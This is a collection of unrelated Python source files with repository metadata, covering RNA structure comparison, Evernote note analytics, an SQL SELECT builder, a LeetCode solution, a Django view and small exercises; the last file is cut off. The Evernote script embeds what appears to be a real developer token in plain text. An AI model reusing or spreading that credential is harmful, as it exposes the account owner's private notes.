diff_unpaired_1, diff_unpaired_2 = dotbracket_comparisons.identify_differentially_paired_positions(\n self.major_conf.pairing_states, self.second_conf.pairing_states)\n self.major_conf.differentially_unpaired_states = diff_unpaired_1\n self.second_conf.differentially_unpaired_states = diff_unpaired_2\n\n\n def get_constant_pairing_states(self):\n constantly_paired_positions, constantly_unpaired_positions = dotbracket_comparisons.identify_constantly_paired_positions(\n self.major_conf.pairing_states, self.second_conf.pairing_states)\n self.major_conf.constantly_paired_positions = constantly_paired_positions\n self.second_conf.constantly_paired_positions = constantly_paired_positions\n self.major_conf.constantly_unpaired_positions = constantly_unpaired_positions\n self.second_conf.constantly_unpaired_positions = constantly_unpaired_positions\n\n\n def get_differential_pairing_states_within_loops(self):\n self.get_differential_pairing_states()\n self.make_mask_of_differential_intervals()\n self.major_conf.differentially_unpaired_states_within_loops = np.logical_and(\n self.major_conf.differentially_unpaired_states,\n self.changing_loops_mask)\n self.second_conf.differentially_unpaired_states_within_loops = np.logical_and(\n self.second_conf.differentially_unpaired_states,\n self.changing_loops_mask)\n\n def get_differential_ACs(self):\n self.get_differential_pairing_states_within_loops()\n self.get_AC_mask()\n self.get_constant_pairing_states()\n self.major_conf.differentially_unpaired_ACs = np.logical_and(\n self.major_conf.differentially_unpaired_states_within_loops,\n self.A_C_mask)\n self.second_conf.differentially_unpaired_ACs = np.logical_and(\n self.second_conf.differentially_unpaired_states_within_loops,\n self.A_C_mask)\n self.major_conf.constant_paired_ACs = np.logical_and(self.major_conf.constantly_paired_positions,\n self.A_C_mask)\n 
self.major_conf.constant_unpaired_ACs = np.logical_and(self.major_conf.constantly_unpaired_positions,\n self.A_C_mask)\n self.second_conf.constant_paired_ACs = self.major_conf.constant_paired_ACs\n self.second_conf.constant_unpaired_ACs = self.major_conf.constant_unpaired_ACs\n\n\n def get_differential_intervals(self):\n all_changing_stretches = np.concatenate((\n self.major_conf.changed_stretches_no_short,\n self.second_conf.changed_stretches_no_short),\n axis=0)\n left_halves = all_changing_stretches[:, 0:2]\n right_halves = all_changing_stretches[:, 2:4]\n all_changing_intervals = np.concatenate((left_halves, right_halves), axis=0)\n all_changing_intervals = np.sort(all_changing_intervals, axis=0)\n all_changing_intervals[:, 1] += 1 # the changing stretches coordinates are exclusive, unlike python coordinates\n merged_changing_intervals = utils.merge_intervals(all_changing_intervals)\n return merged_changing_intervals\n\n\n def make_mask_of_differential_intervals(self):\n merged_changing_intervals = self.get_differential_intervals()\n changing_state = np.zeros(len(self.sequence), dtype=bool)\n for i in range(merged_changing_intervals.shape[0]):\n curr_interval = merged_changing_intervals[i]\n changing_state[curr_interval[0] : curr_interval[1]] = 1\n self.changing_loops_mask = changing_state\n\n\n def get_AC_mask(self):\n A_C_mask = np.zeros(len(self.sequence), dtype=bool)\n\n for i in range(len(self.sequence)):\n curr_nt = self.sequence[i]\n if curr_nt == 'A' or curr_nt =='C':\n A_C_mask[i] = 1\n self.A_C_mask = A_C_mask\n\n\n def convert_to_numpy(self):\n self.major_conf.convert_to_numpy()\n self.second_conf.convert_to_numpy()\n\n\n def print(self,\n show_changing_structures = False,\n show_unchanged_structures = False,\n show_inner_stems = True,\n show_outer_stems = True,\n width = 113,\n do_return = False\n ):\n strings_to_print_list = []\n strings_to_print_list.append(self.name)\n strings_to_print_list.append(\"\")\n strings_to_print_list.append(\"Major loop folding:\")\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n strings_to_print_list = []\n major_str = self.major_conf.print(\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width,\n do_return = do_return\n )\n strings_to_print_list.append(major_str)\n strings_to_print_list.append(\"\")\n strings_to_print_list.append(\"Second loop folding:\")\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n strings_to_print_list = []\n second_str = self.second_conf.print(\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width,\n do_return=do_return\n )\n strings_to_print_list.append(second_str)\n strings_to_print_list.append('\\n\\n')\n if not do_return:\n print(\"\\n\".join(strings_to_print_list))\n else:\n return \"\\n\".join(strings_to_print_list)\n\n def print_differential_ACs(self):\n major_string = \"\".join([\"|\" if x else \".\" for x in self.major_conf.differentially_unpaired_ACs])\n second_string = \"\".join([\"|\" if x else \".\" for x in self.second_conf.differentially_unpaired_ACs])\n return (major_string, second_string)\n\n def print_constant_ACs(self):\n paired_string = \"\".join([\"|\" if x else \".\" for x in self.major_conf.constant_paired_ACs])\n unpaired_string = \"\".join([\"|\" if x else \".\" for x in self.second_conf.constant_unpaired_ACs])\n return (paired_string, unpaired_string)\n\n\nclass conformation:\n def __init__(self):\n self.string = ''\n self.pairing_states = None\n 
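Note: get_differential_intervals above concatenates the left and right halves of the changing stems, widens the exclusive end coordinate by one, and hands the rows to utils.merge_intervals, whose implementation is not part of this record. A merge consistent with that usage, assuming half-open [start, end) rows, could look like the sketch below; note also that np.sort(..., axis=0) in the record sorts the start and end columns independently, which preserves start/end pairing only when the spans do not interleave:

    # Interval-merge sketch matching the assumed semantics of
    # utils.merge_intervals above (non-empty array of [start, end) rows).
    import numpy as np

    def merge_intervals(intervals: np.ndarray) -> np.ndarray:
        order = np.argsort(intervals[:, 0])
        merged = [intervals[order[0]].tolist()]
        for start, end in intervals[order[1:]]:
            if start <= merged[-1][1]:                    # overlapping or touching span
                merged[-1][1] = max(merged[-1][1], end)
            else:
                merged.append([start, end])
        return np.array(merged)

    print(merge_intervals(np.array([[5, 9], [0, 3], [2, 6]])))  # -> [[0 9]]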
self.pairing_states_with_stem_ends = None\n self.numpy = None\n self.constantly_paired_positions = None\n self.constantly_unpaired_positions = None\n self.differentially_unpaired_states = None\n self.differentially_unpaired_states_within_loops = None\n self.differentially_unpaired_ACs = None\n self.constant_paired_ACs = None\n self.constant_unpaired_ACs = None\n self.all_stretches = None\n self.stretches_with_spaces = None\n self.changed_stretches = None\n self.changed_stretches_no_short = None\n self.unchanged_stretches = None\n self.unchanged_inner_stretches = None\n self.outer_stretches = None\n\n\n def get_pairing_states(self):\n self.pairing_states = dotbracket_comparisons.convert_string_to_pairing_states(self.string)\n\n # def get_pairing_states_accounting_for_stem_ends(self):\n # self.get_pairing_states()\n # self.pairing_states_with_stem_ends = self.pairing_states.copy()\n # self.pairing_states_with_stem_ends = dotbracket_comparisons.convert_string_to_pairing_states_with_stem_ends(\n # self.pairing_states_with_stem_ends,\n # self.all_stretches)\n\n\n def convert_to_numpy(self):\n self.numpy = dotbracket_comparisons.convert_string_to_numpy(self.string)\n\n\n def get_all_basepair_stretches(self):\n self.all_stretches = dotbracket_comparisons.list_all_stretches_numpy(self.string)\n\n\n def combine_parts_of_the_same_stretch_together(self, MAX_SPACING):\n if self.all_stretches is not None:\n self.stretches_with_spaces = dotbracket_comparisons.find_parts_of_the_same_stretch(self.string,\n self.all_stretches,\n MAX_SPACING = MAX_SPACING)\n else:\n raise Exception(\"You should find all stretches before finding the stretches with spaces!\")\n\n\n def print(self,\n show_changing_structures,\n show_unchanged_structures,\n show_inner_stems,\n show_outer_stems,\n width,\n do_return = False\n ):\n\n strings_to_print_list = []\n strings_to_print_list.append(\"All stretches\")\n strings_to_print_list.append(textwrap.fill(self.string, width=width))\n\n\n if show_unchanged_structures:\n if self.unchanged_stretches is not None:\n string_to_print = self.get_unchanged_string()\n strings_to_print_list.append(\"The stretches that are the same between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n\n if show_changing_structures:\n if self.changed_stretches_no_short is not None:\n string_to_print = self.get_changing_string()\n strings_to_print_list.append(\"The stretches that change between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n if show_inner_stems:\n if self.unchanged_inner_stretches is not None:\n string_to_print = self.get_unchanged_inner_stretches()\n strings_to_print_list.append(\"The INNER stretches that are the same between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n if show_outer_stems:\n if self.outer_stretches is not None:\n string_to_print = self.get_outer_stretches()\n strings_to_print_list.append(\"The OUTER stretches that are the same between two conformations\")\n strings_to_print_list.append(textwrap.fill(string_to_print, width=width))\n\n final_string_to_print = \"\\n\".join(strings_to_print_list)\n\n if do_return:\n return final_string_to_print\n else:\n print(final_string_to_print)\n return \"\"\n\n\n def get_changing_string(self):\n if self.changed_stretches_no_short is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.changed_stretches_no_short\n )\n return 
string_to_print\n\n\n def get_unchanged_string(self):\n if self.changed_stretches_no_short is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.unchanged_stretches\n )\n return string_to_print\n\n\n def get_unchanged_inner_stretches(self):\n if self.unchanged_inner_stretches is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.unchanged_inner_stretches\n )\n return string_to_print\n\n\n def get_outer_stretches(self):\n if self.outer_stretches is not None:\n string_to_print = dotbracket_comparisons.string_and_stretches_to_print(\n self.string, self.outer_stretches\n )\n return string_to_print\n\n\nclass loop:\n def __init__(self):\n self.left_start = None\n self.left_end = None\n self.right_start = None\n self.right_end = None\n self.length = None\n self.left_seq = None\n self.right_seq = None\n\n\n def initialize_from_dict(self, inp_dict):\n self.left_start = int(inp_dict['forward'][0])\n self.left_end = int(inp_dict['forward'][1]) + 1\n self.right_start = int(inp_dict['backward'][0])\n self.right_end = int(inp_dict['backward'][1]) + 1\n self.length = self.left_end - self.left_start\n\n\n def fill_sequence(self, sequence_np):\n self.left_seq = sequence_np[self.left_start : self.left_end]\n self.right_seq = sequence_np[self.right_start: self.right_end]\n\n\n def get_fraction_unpaired(self, allow_canonical = True):\n n_mismatches = check_base_pairing.n_not_paired_bases(\n self.left_seq, self.right_seq,\n orientation=\"reversed\",\n allow_canonical = allow_canonical)\n fraction_unpaired = n_mismatches / self.length\n return fraction_unpaired\n\n\n def check_if_complementary(self, allow_canonical = True):\n fraction_unpaired = self.get_fraction_unpaired(allow_canonical = allow_canonical)\n is_complementary = fraction_unpaired == 0\n return is_complementary\n\n\n def introduce_random_sequence(self, seed = None,\n GC_only = False):\n if not seed is None:\n np.random.seed(seed)\n if not GC_only:\n low = 1\n high = 5\n else:\n low = 2\n high = 4\n random_sequence_array = np.random.randint(low=low, high=high, size=self.length)\n self.left_seq = random_sequence_array\n self.right_seq = check_base_pairing.make_reverse_complement(self.left_seq)\n\n\n def change_one_side(self, change_left_side = True, seed = None):\n if not seed is None:\n np.random.seed(seed)\n random_sequence_array = np.random.randint(low=1, high=5, size=self.length)\n if change_left_side:\n self.left_seq = random_sequence_array\n else:\n self.right_seq = random_sequence_array\n\n\n def change_one_side_given_seq(self,\n new_seq_array,\n left_subset_border,\n right_subset_border,\n change_left_side = True,\n make_complementary = False):\n subset_length = right_subset_border - left_subset_border\n compl_part_beginning = self.length - right_subset_border\n compl_part_end = compl_part_beginning + subset_length\n\n if change_left_side:\n self.left_seq = new_seq_array\n if make_complementary:\n subset_to_make_complementary = self.left_seq[left_subset_border : right_subset_border]\n complementary_part = check_base_pairing.make_reverse_complement(subset_to_make_complementary)\n self.right_seq[compl_part_beginning : compl_part_end] = complementary_part\n else:\n self.right_seq = new_seq_array\n if make_complementary:\n subset_to_make_complementary = self.right_seq[left_subset_border : right_subset_border]\n complementary_part = check_base_pairing.make_reverse_complement(subset_to_make_complementary)\n self.left_seq[compl_part_beginning 
: compl_part_end] = complementary_part\n\n def mask_out(self):\n mask_none_array = np.full(self.length, glob_vars._none)\n self.left_seq = mask_none_array\n self.right_seq = mask_none_array\n\n\n def longest_paired_stretch(self,\n allow_canonical = True):\n max_bp_stretch = check_base_pairing.max_base_pairs_in_a_row(\n self.left_seq, self.right_seq,\n allow_canonical=allow_canonical)\n return max_bp_stretch\n\n\n def change_original_sequence_accordingly(self, sequence_np):\n out_sequence = sequence_np.copy()\n out_sequence[self.left_start : self.left_end] = self.left_seq\n out_sequence[self.right_start: self.right_end] = self.right_seq\n return out_sequence\n\n\n def scan_original_sequence_for_bp_stretches(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the longest possible base pairing\n # masks out the stem itself\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_stretch = self.scan_other_sequence_for_bp_stretches(masked_sequence_np,\n allow_canonical = allow_canonical)\n return max_stretch\n\n\n def scan_original_sequence_for_bp_stretches_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_stretch = self.scan_other_sequence_for_bp_stretches_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = check_left_side)\n return max_stretch\n\n\n def scan_other_sequence_for_bp_stretches(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the longest possible base pairing\n # array of 2 x N holding lengths of the maximal stretches in each possible pairing\n # the first dimension is of size 2 since I am scanning both forward and reverse sequence\n\n max_stretch_left = self.scan_other_sequence_for_bp_stretches_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = True)\n max_stretch_right = self.scan_other_sequence_for_bp_stretches_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = False)\n max_stretch = max(max_stretch_left, max_stretch_right)\n return max_stretch\n\n\n def scan_other_sequence_for_bp_stretches_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n # scans the provided sequence with one side of the stem and checks for the longest possible base pairing\n # array of 1 x N holding lengths of the maximal stretches in each possible pairing\n full_seq_max_bp_stretches = np.zeros(sequence_np.shape[0] - self.length + 1)\n\n if check_left_side:\n query_sequence = self.left_seq\n else:\n query_sequence = self.right_seq\n\n for i in range(full_seq_max_bp_stretches.shape[0]):\n full_seq_max_bp_stretches[i] = check_base_pairing.max_base_pairs_in_a_row(\n query_sequence,\n sequence_np[i: i + self.length],\n allow_canonical = allow_canonical)\n max_stretch = np.max(full_seq_max_bp_stretches)\n return max_stretch\n\n\n def scan_original_sequence_for_number_of_bps(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the maximal possible number of base pairs\n # masks out the stem itself\n masked_sequence_np = copy.deepcopy(sequence_np)\n 
masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_number_of_base_pairs = self.scan_other_sequence_for_number_of_bps(masked_sequence_np,\n allow_canonical = allow_canonical)\n return max_number_of_base_pairs\n\n\n def scan_original_sequence_for_number_of_bps_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n masked_sequence_np = copy.deepcopy(sequence_np)\n masked_sequence_np[self.left_start : self.left_end] = -1\n masked_sequence_np[self.right_start: self.right_end] = -1\n max_number_of_base_pairs = self.scan_other_sequence_for_number_of_bp_one_loop(\n masked_sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = check_left_side)\n return max_number_of_base_pairs\n\n\n def scan_other_sequence_for_number_of_bps(self, sequence_np, allow_canonical = False):\n # scans the provided sequence with both sides of the stem and checks for the maximal possible number of base pairs\n # array of 2 x N holding lengths of the maximal possible number of base pairs in each position\n # the first dimension is of size 2 since I am scanning both forward and reverse sequence\n\n max_number_of_base_pairs_left = self.scan_other_sequence_for_number_of_bp_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = True)\n max_number_of_base_pairs_right = self.scan_other_sequence_for_number_of_bp_one_loop(\n sequence_np,\n allow_canonical = allow_canonical,\n check_left_side = False)\n max_number_of_base_pairs = max(max_number_of_base_pairs_left, max_number_of_base_pairs_right)\n return max_number_of_base_pairs\n\n\n def scan_other_sequence_for_number_of_bp_one_loop(self, sequence_np, allow_canonical = False,\n check_left_side = True):\n # scans the provided sequence with one side of the stem and counts the number of base pairs\n # array of 1 x N holding number of possible base pairs at each positions\n number_of_base_pairs = np.zeros(sequence_np.shape[0] - self.length + 1)\n if check_left_side:\n query_sequence = self.left_seq\n else:\n query_sequence = self.right_seq\n\n for i in range(number_of_base_pairs.shape[0]):\n number_of_mismatches = check_base_pairing.n_not_paired_bases(\n query_sequence,\n sequence_np[i: i + self.length],\n allow_canonical=allow_canonical)\n number_of_base_pairs[i] = self.length - number_of_mismatches\n max_number_of_base_pairs = np.max(number_of_base_pairs)\n return max_number_of_base_pairs\n\n\n def compare_to_base_pair_array(self, base_pair_obj,\n do_print = False):\n bps_of_interest = base_pair_obj.array[self.left_start : self.left_end]\n expected_bps = np.arange(self.right_end - 1, self.right_start - 1, -1)\n same_bps_number = (expected_bps == bps_of_interest).sum()\n if do_print:\n print(\"bps of interest\")\n print(bps_of_interest)\n print(\"expected bps\")\n print(expected_bps)\n\n return same_bps_number\n\n\n def copy(self):\n new_loop = copy.deepcopy(self)\n return new_loop\n\n\n def print(self, do_return = False):\n string_to_print = \"Left stretch: %d - %d ; right stretch: %d - %d\\n\" % \\\n (self.left_start, self.left_end, self.right_start, self.right_end)\n if not self.left_seq is None and not self.right_seq is None:\n string_to_print += \"Left sequence: %s ; right sequence %s\\n\" % \\\n (utils.array_to_string(self.left_seq), utils.array_to_string(self.right_seq))\n if do_return:\n return string_to_print\n print(string_to_print)\n\n\n def get_base_pairing_array(self, sequence_np):\n base_pairing_state_array = np.full(sequence_np.shape[0], 
glob_vars._loop, dtype = np.uint8)\n base_pairing_state_array[self.left_start : self.left_end] = glob_vars._left_stem\n base_pairing_state_array[self.right_start: self.right_end] = glob_vars._right_stem\n return base_pairing_state_array\n\n\n def get_dot_bracket_string(self, sequence_np):\n base_pairing_state_array = self.get_base_pairing_array(sequence_np)\n base_pairing_state_strings_array = [glob_vars._extended_structure_to_char[x] for x in base_pairing_state_array]\n base_pairing_state_string = \"\".join(base_pairing_state_strings_array)\n return base_pairing_state_string\n\n\n\nclass base_pair_array:\n def __init__(self, inp_string):\n self.string = inp_string\n self.fill_array_from_string()\n\n def fill_array_from_string(self, unpaired_value = -1):\n bp_array = np.full(len(self.string), unpaired_value, dtype = int)\n stretches_np = dotbracket_comparisons.list_all_stretches_numpy(self.string)\n for i in range(stretches_np.shape[0]):\n current_stretch = stretches_np[i, :]\n stretch_length = current_stretch[1] - current_stretch[0] + 1\n for k in range(stretch_length):\n left_position = current_stretch[0] + k\n right_position = current_stretch[3] - k\n bp_array[left_position] = right_position\n bp_array[right_position] = left_position\n self.array = bp_array\n\n def array_to_string(self):\n pairing_mode_array = np.zeros(self.array.shape[0], dtype = np.uint8)\n indices = np.arange(self.array.shape[0])\n pairing_mode_array[indices < self.array] = glob_vars._left_stem\n pairing_mode_array[indices > self.array] = glob_vars._right_stem\n pairing_mode_array[self.array < 0] = glob_vars._loop\n string_to_write_list = [glob_vars._extended_structure_to_char[x] for x in pairing_mode_array]\n string_to_write = \"\".join(string_to_write_list)\n return string_to_write\n\n\n\n\n\n","repo_name":"goodarzilab/SwitchFinder","sub_path":"SwitchFinder/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":32174,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"27050848284","text":"# coding=UTF-8\nimport collections\nimport re\n\nimport matplotlib.pyplot as plt\nfrom evernote.api.client import EvernoteClient\nfrom evernote.edam.notestore import NoteStore\nfrom matplotlib import font_manager\n\n# Set a font so that matplotlib can display Chinese characters\na = sorted([f.name for f in font_manager.fontManager.ttflist])\nfor i in a:\n print(i)\nplt.rcParams['font.sans-serif'] = ['Heiti TC']\nplt.rcParams['axes.unicode_minus'] = False\n\n# Enter your developer token here.\ndeveloper_token = \"S=s58:U=12c3708:E=185be87b347:C=1859a7b2d90:P=1cd:A=en-devtoken:V=2:H=4efa402093efe8dab07bffa29495953d\"\n\n# Initialize parameters\nsandbox = False\nchina = True\n\n# Get the client\nclient = EvernoteClient(token=developer_token, sandbox=sandbox, china=china)\n\n# Get the user store\nuser_store = client.get_user_store()\n\nversion_ok = user_store.checkVersion(\"Evernote EDAMTest (Python)\", 1, 25)\nprint(\"Is my Evernote API version up to date? 
\", str(version_ok))\nprint(\"\")\nif not version_ok:\n exit(1)\n\nnote_store = client.get_note_store()\n\n# List all notebooks\nnotebooks = note_store.listNotebooks()\nprint(\"Found \", len(notebooks), \" notebooks:\")\nprint()\n\nfor notebook in notebooks:\n print(notebook.name)\nprint()\n\n# Fetch a notebook by its GUID\nguid = 'c919a3d7-e1f6-4950-9755-7187e5e546e0'\nnotebook = note_store.getNotebook(guid)\nprint(\"现在拿到的是:\" + notebook.name + \"笔记本\")\nprint()\n\n# List/create saved searches\nsearches = note_store.listSearches()\n\n# Get all notes in the notebook by its GUID\nnoteFilter = NoteStore.NoteFilter()\nnoteFilter.notebookGuid = guid\nnotesMetadataResultSpec = NoteStore.NotesMetadataResultSpec(True)\nnoteList = note_store.findNotesMetadata(noteFilter, 0, 100, notesMetadataResultSpec)\n\n\n# Reduce the note content to a string containing only Chinese characters\ndef translate(str):\n line = str.strip()\n pattern = re.compile('[^\\u4e00-\\u9fa50-9]')\n # Keep only Chinese characters and digits\n zh = \"\".join(pattern.split(line)).strip()\n # Strip digits\n zh = re.sub('\\d+', '', zh)\n # Strip boilerplate fields\n outStr = zh.replace(\n \"每日日程安排周年月日开始时间微软雅黑时间微软雅黑周一微软雅黑周二微软雅黑周三微软雅黑周四微软雅黑周五微软雅黑周六微软雅黑周日微软雅黑微软雅黑\",\n '').replace(\"微软雅黑\",\n '').replace(\n \"星期一星期二星期三星期四星期五星期六星期七\", '')\n return outStr\n\n\n# Convert the string into a list of items\ndef createWordsList(outStr):\n words = []\n outStr = translate(outStr)\n if ((len(outStr) % 4) != 0):\n print(len(outStr))\n print(\"数据格式有问题\")\n else:\n for i in range(len(outStr)):\n if (i % 4 == 0):\n word = outStr[i:i + 4]\n words.append(word)\n\n print(collections.Counter(words))\n return words\n\n\n# Tally the time spent over the whole year\n# words = []\n# for i in range(0, len(noteList.notes)):\n# note = note_store.getNote(noteList.notes[i].guid, True, True, True, True)\n# temp = \"\" + note.title\n# if temp.__contains__(\"2022\"):\n# words = words + createWordsList(note.content)\n#\n# counter = collections.Counter(words).get(\"欢度元旦\")\n# collections.Counter(words).items()\n# print(collections.Counter(words))\n\n\n# Identify the target note by its title\ntitle = '2023年第3周'\nfor note in noteList.notes:\n if note.title == title:\n requiredNote = note_store.getNote(note.guid, True, True, True, True)\n\n# Search and replace certain content in the note\n# newText = requiredNote.content.replace(\"冲刺\", \"工作\")\n# requiredNote.content = newText\n# note_store.updateNote(requiredNote)\n\n# Tally this week's time spent and plot it\ncounter = dict(sorted(collections.Counter(createWordsList(requiredNote.content)).items(), key=lambda item: item[1]))\nfor key in counter.keys():\n counter[key] = counter[key] / 2\nrects = plt.barh(range(len(list(counter.values()))), list(counter.values()), color=[\n 'seagreen', 'chocolate', 'darkorange', 'lightcoral', 'lightsalmon'\n])\nindex = [float(c) for c in range(len(list(counter.keys())))]\nplt.xlim(xmax=max(counter.values()) * 1.3, xmin=0)\nplt.yticks(index, list(counter.keys()))\nplt.title(requiredNote.title + '时间使用情况')\nplt.xlabel(\"花费时间(小时)\")\nfor rect in rects:\n width = rect.get_width()\n plt.text(width, rect.get_y() + rect.get_height() / 2, str(width), ha='left', va='center')\n\n# Keep the saved figure from being cut off\nplt.tight_layout()\n\n# Write the figure to a file\nplt.savefig(\"/Users/anshaowei/Downloads/count.png\", dpi=300)\nexit(1)\n","repo_name":"anshaowei/timeManager","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34209626855","text":"from collections import deque\n\nfrom rosshm import log\nfrom rosshm.db.utils import fieldType\n\nlang = None\n\ndef select(obj, filter, where):\n\ttable = obj.tblname\n\tfields = tuple(obj.fields.keys())\n\targs = tuple()\n\tselect = '*'\n\tflen = len(filter)\n\tif 
 flen == 1:\n\t\tselect = filter[0]\n\telif flen > 1:\n\t\tnames = deque()\n\t\tfor n in filter:\n\t\t\tif n in fields:\n\t\t\t\tnames.append(n)\n\t\tselect = \"%s\" % ', '.join(names)\n\ts = f\"SELECT {select} FROM {table} WHERE\"\n\tcond = ' '\n\tfor k, v in where.items():\n\t\tif k == 'pk' or k in fields:\n\t\t\ttyp = fieldType(obj.fields, k)\n\t\t\ts += f\"{cond}{k}=\" + lang.valfmt(typ)\n\t\t\targs += (typ(v),)\n\t\t\tcond = ' AND '\n\ts += \";\"\n\tlog.debug(s)\n\treturn (s, args)\n","repo_name":"jrmsgit/rosshm","sub_path":"rosshm/db/sql/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2616752457","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n\n def widthOfBinaryTree(self, root) -> int:\n data = []\n self.dd(root, 0, 0, data)\n maxWidth = 0\n for d in data:\n if d[1]-d[0] > maxWidth:\n maxWidth = d[1]-d[0]\n return maxWidth+1\n \n def dd(self, root, level, x, data):\n if root is None:\n return\n \n while(len(data) < level+1):\n data.append([])\n \n if data[level] == []:\n data[level] = [x,x]\n elif x < data[level][0]:\n data[level][0] = x\n elif x > data[level][1]:\n data[level][1] = x\n \n \n self.dd(root.left, level+1, 2*x, data)\n self.dd(root.right, level+1, (2*x)+1, data)\n \n \n \n \n \n","repo_name":"semere01/Comptetitive-Programming","sub_path":"camp/week4/maximum-width-of-binary-tree.py","file_name":"maximum-width-of-binary-tree.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14789123438","text":"from django.views import View\nfrom django import http\n\nfrom goods.models import GoodsCategory, SKU\n\n\nclass HotGoodsView(View):\n def get(self, request, category_id):\n # try:...\n category = GoodsCategory.objects.get(id=category_id)\n # one-to-many\n skus = category.sku_set.filter(is_launched=True).order_by('-sales')[0:2]\n hot_skus = []\n for sku in skus:\n hot_skus.append({\n 'id': sku.id,\n 'name': sku.name,\n 'default_image_url': sku.default_image.url,\n 'price': sku.price\n })\n return http.JsonResponse({'code': 'OK', 'errmsg': 'ok', 'hot_skus': hot_skus})\n","repo_name":"fengyuan0807/new","sub_path":"打包2/django美多前台最后一天/meiduo_mall/test/热销排行.py","file_name":"热销排行.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39204152693","text":"import streamlit as st\nfrom PIL import Image\n\nimage = Image.open('GRS_logo.png')\nst.set_page_config(page_title=\"Home\", page_icon=\"🛖\", layout=\"wide\")\nst.image(image, width=300)\n\nst.write(\"# Welcome to Dr. Shirley monitoring system! 
v1.1 🙌\")\n\nst.sidebar.success(\"Let's go.\")\n\nst.markdown(\n \"\"\"\n #### *Dieses App ist für Anwendung Filtermethoden der Beschleunigungsdaten gemessen mit ADXL345 3-Axen Beschleunigungssensor*\n\n ---\n ### Wollen Sie die importierte Daten sehen?\n Checkout [Gallery](Gallery)\n ### Wollen Sie die neue csv-Dateien hochladen?\n Checkout [Upload](Upload)\n \"\"\"\n)\n","repo_name":"hydrophyl/dr_shirley_monitoring","sub_path":"_Home.py","file_name":"_Home.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2319028714","text":"l,u=map(int,input().split())\nfor num in range(l+1, u):\n sum = 0\n t = num\n while t > 0:\n digit = t % 10\n sum += digit ** 3\n t //= 10\n if (num == sum):\n print(num,end=\" \")\n \n","repo_name":"SSelvakumari/selva","sub_path":"code kata/armstrongrange.py","file_name":"armstrongrange.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23880486997","text":"stu_names = {'Mike', 'John', 'Andrew', 'Alice'}\ntut_name = {'John', 'Gerald', 'Don', 'Brian'}\nprint(stu_names | tut_name)\nprint(stu_names & tut_name)\nsorted_names = sorted(tut_name)\nprint('the sorted names are', sorted_names)\njoint_names = '-'.join(stu_names)\nprint('The joint names are', joint_names)\n\n\ndef countif(my_list, condition):\n return len([i for i in my_list if eval(condition)])\n\n\nl = [56, 2, 4, 67, 87]\nprint(countif(l, 'i > 5'))\n\nmytuple = (\"apple\", \"banana\", \"cherry\")\nmyit = iter(mytuple)\n\nprint(next(myit))\nprint(next(myit))\nprint(next(myit))\n\n# making a class iterable\n\n\nclass Numbers:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n if self.a < 15:\n x = self.a\n self.a += 1\n return x\n else:\n raise StopIteration\n\n\n# my_class = Numbers()\n# my_l = iter(my_class)\n\n# for x in my_l:\n# print(x)\n\n# enumerate function- prints out the index position and the corresponding tuple element as well\nmy_tuple2 = (\"apple\", \"banana\", \"cherry\", 'mango')\nfor (i, x) in enumerate(my_tuple2):\n print(i+1, x)\n\n# zip function\nnames = ['Mike', 'Brian', 'Mary', 'Kevin']\nscore = (65, 67, 62, 64)\nmerged_list = zip(names, score)\nmerge2 = dict(merged_list)\nprint(merge2)\nfor (i, x) in enumerate(merge2):\n print(i+1, x)\n\n# list version\n# print(list(merged_list))\n\nfrom random import shuffle\n\n# create the encryption key (shuffle mutates the list in place and returns None)\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nL = 